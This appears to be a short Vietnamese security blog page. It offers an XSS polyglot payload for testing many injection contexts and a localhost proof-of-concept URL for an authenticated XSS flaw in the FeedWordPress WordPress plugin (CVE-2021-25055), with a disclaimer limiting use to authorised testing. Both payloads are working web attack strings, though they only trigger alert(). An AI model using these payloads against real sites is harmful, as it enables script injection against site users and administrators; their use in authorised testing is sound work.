XXS – Nhat Truong Blog

XSS Polyglots: Test multiple XSS scenarios with ONE payload.

“Mọi kiến thức trong bài viết chỉ phục vụ mục đích giáo dục và an toàn thông tin.Không được sử dụng để tấn công hệ thống mà bạn không sở hữu hoặc không được phép kiểm thử.” Use the payload for testing multiple XSS scenarios 🙂 That’s all jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/–!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

[CVE-2021-25055] FeedWordPress < 2022.0123- Cross-Site Scripting (Authenticated)

# Referrer: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25055https://wpscan.com/vulnerability/7ed050a4-27eb-4ecb-9182-1d8fa1e71571# Version: 1.0# Tested on: Windows 10 + XAMPP v3.2.4POC: http://localhost/wordpress/wp-admin/admin.php?page=feedwordpress/syndication.php&visibility='”><img+src=2+onerror=alert(origin)>